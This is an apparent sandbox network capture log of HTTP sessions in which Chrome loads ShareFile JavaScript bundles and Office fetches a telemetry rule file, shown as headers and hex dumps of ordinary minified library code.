                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC16384INData Raw: 3b 63 61 73 65 20 34 31 3a 63 61 73 65 20 39 33 3a 72 65 74 75 72 6e 20 31 7d 72 65 74 75 72 6e 20 30 7d 66 75 6e 63 74 69 6f 6e 20 52 28 65 29 7b 72 65 74 75 72 6e 20 6d 3d 76 3d 31 2c 79 3d 64 28 4f 3d 65 29 2c 62 3d 30 2c 5b 5d 7d 66 75 6e 63 74 69 6f 6e 20 41 28 65 29 7b 72 65 74 75 72 6e 20 4f 3d 22 22 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 65 29 7b 72 65 74 75 72 6e 20 73 28 50 28 62 2d 31 2c 54 28 39 31 3d 3d 3d 65 3f 65 2b 32 3a 34 30 3d 3d 3d 65 3f 65 2b 31 3a 65 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 4c 28 65 29 7b 66 6f 72 28 3b 28 77 3d 6a 28 29 29 26 26 77 3c 33 33 3b 29 45 28 29 3b 72 65 74 75 72 6e 20 43 28 65 29 3e 32 7c 7c 43 28 77 29 3e 33 3f 22 22 3a 22 20 22 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 2c 74 29 7b 66 6f 72 28 3b 2d 2d 74
                                                                                                                                                                                                                                                                                Data Ascii: ;case 41:case 93:return 1}return 0}function R(e){return m=v=1,y=d(O=e),b=0,[]}function A(e){return O="",e}function N(e){return s(P(b-1,T(91===e?e+2:40===e?e+1:e)))}function L(e){for(;(w=j())&&w<33;)E();return C(e)>2||C(w)>3?"":" "}function D(e,t){for(;--t
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC16384INData Raw: 29 29 72 65 74 75 72 6e 21 31 7d 65 6c 73 65 20 69 66 28 21 62 28 74 2e 71 75 65 72 79 4b 65 79 2c 61 29 29 72 65 74 75 72 6e 21 31 3b 69 66 28 22 61 6c 6c 22 21 3d 3d 72 29 7b 63 6f 6e 73 74 20 65 3d 74 2e 69 73 41 63 74 69 76 65 28 29 3b 69 66 28 22 61 63 74 69 76 65 22 3d 3d 3d 72 26 26 21 65 29 72 65 74 75 72 6e 21 31 3b 69 66 28 22 69 6e 61 63 74 69 76 65 22 3d 3d 3d 72 26 26 65 29 72 65 74 75 72 6e 21 31 7d 72 65 74 75 72 6e 21 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 73 26 26 74 2e 69 73 53 74 61 6c 65 28 29 21 3d 3d 73 7c 7c 76 6f 69 64 20 30 21 3d 3d 69 26 26 69 21 3d 3d 74 2e 73 74 61 74 65 2e 66 65 74 63 68 53 74 61 74 75 73 7c 7c 6f 26 26 21 6f 28 74 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 29 7b 63 6f 6e 73 74 7b 65
                                                                                                                                                                                                                                                                                Data Ascii: ))return!1}else if(!b(t.queryKey,a))return!1;if("all"!==r){const e=t.isActive();if("active"===r&&!e)return!1;if("inactive"===r&&e)return!1}return!("boolean"==typeof s&&t.isStale()!==s||void 0!==i&&i!==t.state.fetchStatus||o&&!o(t))}function m(e,t){const{e
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC14808INData Raw: 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 73 7d 66 69 6e 64 28 65 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 65 2e 65 78 61 63 74 26 26 28 65 2e 65 78 61 63 74 3d 21 30 29 2c 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 73 2e 66 69 6e 64 28 28 74 3d 3e 6d 28 65 2c 74 29 29 29 7d 66 69 6e 64 41 6c 6c 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 73 2e 66 69 6c 74 65 72 28 28 74 3d 3e 6d 28 65 2c 74 29 29 29 7d 6e 6f 74 69 66 79 28 65 29 7b 46 2e 62 61 74 63 68 28 28 28 29 3d 3e 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 74 28 65 29 7d 29 29 7d 29 29 7d 72 65 73 75 6d 65 50 61 75 73 65 64 4d 75 74 61 74 69 6f 6e 73 28 29 7b 63 6f 6e 73 74 20 65 3d 74 68 69
                                                                                                                                                                                                                                                                                Data Ascii: (){return this.mutations}find(e){return void 0===e.exact&&(e.exact=!0),this.mutations.find((t=>m(e,t)))}findAll(e){return this.mutations.filter((t=>m(e,t)))}notify(e){F.batch((()=>{this.listeners.forEach((t=>{t(e)}))}))}resumePausedMutations(){const e=thi
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC1576INData Raw: 68 69 73 2e 6d 75 74 61 74 65 4f 70 74 69 6f 6e 73 29 2e 6f 6e 53 75 63 63 65 73 73 29 7c 7c 74 2e 63 61 6c 6c 28 72 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 52 65 73 75 6c 74 2e 64 61 74 61 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 52 65 73 75 6c 74 2e 76 61 72 69 61 62 6c 65 73 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 52 65 73 75 6c 74 2e 63 6f 6e 74 65 78 74 29 2c 6e 75 6c 6c 3d 3d 28 6e 3d 28 69 3d 74 68 69 73 2e 6d 75 74 61 74 65 4f 70 74 69 6f 6e 73 29 2e 6f 6e 53 65 74 74 6c 65 64 29 7c 7c 6e 2e 63 61 6c 6c 28 69 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 52 65 73 75 6c 74 2e 64 61 74 61 2c 6e 75 6c 6c 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 52 65 73 75 6c 74 2e 76 61 72 69 61 62 6c 65 73 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 52 65 73 75 6c 74 2e 63 6f 6e 74
                                                                                                                                                                                                                                                                                Data Ascii: his.mutateOptions).onSuccess)||t.call(r,this.currentResult.data,this.currentResult.variables,this.currentResult.context),null==(n=(i=this.mutateOptions).onSettled)||n.call(i,this.currentResult.data,null,this.currentResult.variables,this.currentResult.cont


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                77192.168.2.64980513.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:16 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 469
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                                                                                                x-ms-request-id: 06ea2a23-001e-005a-4efb-19c3d0000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180516Z-185b7d577bd6kqv2c47qpxmgb000000001bg00000001671g
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                78192.168.2.64980213.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC596OUTGET /sharefile-web/sharefiledev-client-pilet/0.8.16/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 171393
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 18 Sep 2024 19:40:42 GMT
                                                                                                                                                                                                                                                                                ETag: "41e01b6ff80bcb6f70560c42ba70e4b2"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 29051585a13addd312c8ac9d527433c6.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: zES8QWclCAMhWWw5ANR_DNjZLDiu1pWLonon3O6zN1ifzPpsKYkgtg==
                                                                                                                                                                                                                                                                                Age: 45976
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 63 6c 69 65 6e 74 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 69 3d 7b 7d 2c 6f 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 75 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevclientpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},o={},a={},s={},u={},c={};return
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC16384INData Raw: 2c 75 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 74 79 6c 65 22 29 3b 75 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 24 2c 61 29 2c 73 26 26 6f 26 26 75 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 4b 2c 22 22 2e 63 6f 6e 63 61 74 28 6f 29 29 2c 6e 75 6c 6c 21 3d 6e 26 26 6e 2e 6e 6f 6e 63 65 26 26 28 75 2e 6e 6f 6e 63 65 3d 6e 75 6c 6c 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 6e 6f 6e 63 65 29 2c 75 2e 69 6e 6e 65 72 48 54 4d 4c 3d 65 3b 76 61 72 20 63 3d 59 28 74 29 2c 6c 3d 63 2e 66 69 72 73 74 43 68 69 6c 64 3b 69 66 28 72 29 7b 69 66 28 73 29 7b 76 61 72 20 66 3d 28 74 2e 73 74 79 6c 65 73 7c 7c 51 28 63 29 29 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 5b 22 70 72 65 70 65 6e 64 22 2c 22 70
                                                                                                                                                                                                                                                                                Data Ascii: ,u=document.createElement("style");u.setAttribute($,a),s&&o&&u.setAttribute(K,"".concat(o)),null!=n&&n.nonce&&(u.nonce=null==n?void 0:n.nonce),u.innerHTML=e;var c=Y(t),l=c.firstChild;if(r){if(s){var f=(t.styles||Q(c)).filter((function(e){if(!["prepend","p
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC16384INData Raw: 33 3d 75 3b 63 61 73 65 20 34 33 3a 75 3d 6e 2e 74 33 3b 63 61 73 65 20 34 34 3a 6e 2e 6e 65 78 74 3d 33 35 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 36 3a 6e 2e 6e 65 78 74 3d 35 31 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 38 3a 6e 2e 70 72 65 76 3d 34 38 2c 6e 2e 74 34 3d 6e 5b 22 63 61 74 63 68 22 5d 28 33 33 29 2c 63 2e 65 28 6e 2e 74 34 29 3b 63 61 73 65 20 35 31 3a 72 65 74 75 72 6e 20 6e 2e 70 72 65 76 3d 35 31 2c 63 2e 66 28 29 2c 6e 2e 66 69 6e 69 73 68 28 35 31 29 3b 63 61 73 65 20 35 34 3a 69 66 28 75 21 3d 3d 75 6e 64 65 66 69 6e 65 64 29 7b 6e 2e 6e 65 78 74 3d 36 30 3b 62 72 65 61 6b 7d 69 66 28 21 28 6e 2e 74 32 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 29 29 7b 6e 2e 6e 65 78 74 3d 35 39 3b 62 72 65 61 6b 7d 74 68 72 6f 77 20 6e 65 77
                                                                                                                                                                                                                                                                                Data Ascii: 3=u;case 43:u=n.t3;case 44:n.next=35;break;case 46:n.next=51;break;case 48:n.prev=48,n.t4=n["catch"](33),c.e(n.t4);case 51:return n.prev=51,c.f(),n.finish(51);case 54:if(u!==undefined){n.next=60;break}if(!(n.t2 instanceof Error)){n.next=59;break}throw new
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC14808INData Raw: 65 42 6c 6f 63 6b 50 61 72 61 6d 65 74 65 72 73 22 2c 76 61 6c 75 65 3a 28 69 3d 28 30 2c 71 2e 5a 29 28 24 28 29 2e 6d 61 72 6b 28 28 66 75 6e 63 74 69 6f 6e 20 79 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 24 28 29 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 6e 2e 70 72 65 76 3d 6e 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 6e 2e 6e 65 78 74 3d 32 2c 74 68 69 73 2e 72 65 70 6c 61 63 65 42 6c 6f 63 6b 50 61 72 61 6d 65 74 65 72 73 52 61 77 28 65 2c 74 29 3b 63 61 73 65 20 32 3a 63 61 73 65 22 65 6e 64 22 3a 72 65 74 75 72 6e 20 6e 2e 73 74 6f 70 28 29 7d 7d 29 2c 79 2c 74 68 69 73 29 7d 29 29 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 69 2e 61 70 70 6c 79 28
                                                                                                                                                                                                                                                                                Data Ascii: eBlockParameters",value:(i=(0,q.Z)($().mark((function y(e,t){return $().wrap((function(n){for(;;)switch(n.prev=n.next){case 0:return n.next=2,this.replaceBlockParametersRaw(e,t);case 2:case"end":return n.stop()}}),y,this)}))),function(e,t){return i.apply(
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC416INData Raw: 69 65 77 73 2f 7a 6f 6e 65 73 22 2c 6d 65 74 68 6f 64 3a 22 50 4f 53 54 22 2c 68 65 61 64 65 72 73 3a 72 2c 71 75 65 72 79 3a 6e 2c 62 6f 64 79 3a 70 28 65 2e 61 64 64 5a 6f 6e 65 54 6f 56 69 65 77 29 7d 2c 74 29 3b 63 61 73 65 20 31 38 3a 72 65 74 75 72 6e 20 69 3d 6f 2e 73 65 6e 74 2c 6f 2e 61 62 72 75 70 74 28 22 72 65 74 75 72 6e 22 2c 6e 65 77 20 6c 65 28 69 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 44 28 65 29 7d 29 29 29 3b 63 61 73 65 20 32 30 3a 63 61 73 65 22 65 6e 64 22 3a 72 65 74 75 72 6e 20 6f 2e 73 74 6f 70 28 29 7d 7d 29 2c 6c 2c 74 68 69 73 29 7d 29 29 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 63 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 7d 2c 7b 6b 65 79 3a 22
                                                                                                                                                                                                                                                                                Data Ascii: iews/zones",method:"POST",headers:r,query:n,body:p(e.addZoneToView)},t);case 18:return i=o.sent,o.abrupt("return",new le(i,(function(e){return D(e)})));case 20:case"end":return o.stop()}}),l,this)}))),function(e,t){return c.apply(this,arguments)})},{key:"
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC12792INData Raw: 5b 30 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 72 5b 30 5d 3a 7b 7d 2c 74 3d 72 2e 6c 65 6e 67 74 68 3e 31 3f 72 5b 31 5d 3a 75 6e 64 65 66 69 6e 65 64 2c 69 2e 6e 65 78 74 3d 34 2c 74 68 69 73 2e 63 72 65 61 74 65 5a 6f 6e 65 52 61 77 28 65 2c 74 29 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 6e 3d 69 2e 73 65 6e 74 2c 69 2e 6e 65 78 74 3d 37 2c 6e 2e 76 61 6c 75 65 28 29 3b 63 61 73 65 20 37 3a 72 65 74 75 72 6e 20 69 2e 61 62 72 75 70 74 28 22 72 65 74 75 72 6e 22 2c 69 2e 73 65 6e 74 29 3b 63 61 73 65 20 38 3a 63 61 73 65 22 65 6e 64 22 3a 72 65 74 75 72 6e 20 69 2e 73 74 6f 70 28 29 7d 7d 29 2c 66 2c 74 68 69 73 29 7d 29 29 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73
                                                                                                                                                                                                                                                                                Data Ascii: [0]!==undefined?r[0]:{},t=r.length>1?r[1]:undefined,i.next=4,this.createZoneRaw(e,t);case 4:return n=i.sent,i.next=7,n.value();case 7:return i.abrupt("return",i.sent);case 8:case"end":return i.stop()}}),f,this)}))),function(){return u.apply(this,arguments
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC12792INData Raw: 65 74 3a 72 7d 29 7d 2c 74 2e 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 5b 22 64 65 66 61 75 6c 74 22 5d 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 3b 72 65 74 75 72 6e 20 74 2e 64 28 6e 2c 22 61 22 2c 6e 29 2c 6e 7d 2c 74 2e 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 74 29 7d 2c 74 2e 70 3d 22 22 2c 74 28 74 2e 73 3d 31 29 7d 28 5b 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f
                                                                                                                                                                                                                                                                                Data Ascii: et:r})},t.n=function(e){var n=e&&e.__esModule?function(){return e["default"]}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="",t(t.s=1)}([function(e,t,n){Object.defineProperty(t,"__esMo
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC12792INData Raw: 66 20 65 7c 7c 72 28 65 29 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 74 3d 65 2b 22 22 3b 72 65 74 75 72 6e 22 30 22 3d 3d 74 26 26 31 2f 65 3d 3d 2d 49 6e 66 69 6e 69 74 79 3f 22 2d 30 22 3a 74 7d 7d 2c 38 30 33 34 36 3a 65 3d 3e 7b 76 61 72 20 74 3d 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 6e 75 6c 6c 21 3d 65 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 74 2e 63 61 6c 6c 28 65 29 7d 63 61 74 63 68 28 6d 29 7b 7d 74 72 79 7b 72 65 74 75 72 6e 20 65 2b 22 22 7d 63 61 74 63 68 28 6d 29 7b 7d 7d 72 65 74 75 72 6e 22 22 7d 7d 2c 37 37 38 31 33 3a 65 3d 3e 7b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e
                                                                                                                                                                                                                                                                                Data Ascii: f e||r(e))return e;var t=e+"";return"0"==t&&1/e==-Infinity?"-0":t}},80346:e=>{var t=Function.prototype.toString;e.exports=function(e){if(null!=e){try{return t.call(e)}catch(m){}try{return e+""}catch(m){}}return""}},77813:e=>{e.exports=function(e,t){return
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC12792INData Raw: 72 28 76 61 72 20 72 20 69 6e 20 6e 29 28 7b 7d 29 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 72 29 26 26 28 65 5b 72 5d 3d 6e 5b 72 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 72 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 6e 2e 64 28 74 2c 7b 5a 3a 28 29 3d 3e 72 7d 29 7d 2c 36 31 31 32 30 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 72 65 74 75 72 6e 20 72 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 2e 62 69 6e 64 28 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72
                                                                                                                                                                                                                                                                                Data Ascii: r(var r in n)({}).hasOwnProperty.call(n,r)&&(e[r]=n[r])}return e},r.apply(null,arguments)}n.d(t,{Z:()=>r})},61120:(e,t,n)=>{"use strict";function r(e){return r=Object.setPrototypeOf?Object.getPrototypeOf.bind():function(e){return e.__proto__||Object.getPr
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC12792INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 2e 68 61 73 52 65 73 6f 75 72 63 65 42 75 6e 64 6c 65 28 65 2c 74 29 26 26 64 65 6c 65 74 65 20 74 68 69 73 2e 64 61 74 61 5b 65 5d 5b 74 5d 2c 74 68 69 73 2e 72 65 6d 6f 76 65 4e 61 6d 65 73 70 61 63 65 73 28 74 29 2c 74 68 69 73 2e 65 6d 69 74 28 22 72 65 6d 6f 76 65 64 22 2c 65 2c 74 29 7d 7d 2c 7b 6b 65 79 3a 22 68 61 73 52 65 73 6f 75 72 63 65 42 75 6e 64 6c 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 52 65 73 6f 75 72 63 65 28 65 2c 74 29 21 3d 3d 75 6e 64 65 66 69 6e 65 64 7d 7d 2c 7b 6b 65 79 3a 22 67 65 74 52 65 73 6f 75 72 63 65 42 75 6e 64 6c 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74
                                                                                                                                                                                                                                                                                Data Ascii: :function(e,t){this.hasResourceBundle(e,t)&&delete this.data[e][t],this.removeNamespaces(t),this.emit("removed",e,t)}},{key:"hasResourceBundle",value:function(e,t){return this.getResource(e,t)!==undefined}},{key:"getResourceBundle",value:function(e,t){ret


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                79192.168.2.64980613.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC602OUTGET /sharefile-web/sharefiledev-user-act-hist-pilet/1.7.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC610INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 91744
                                                                                                                                                                                                                                                                                Connection: close
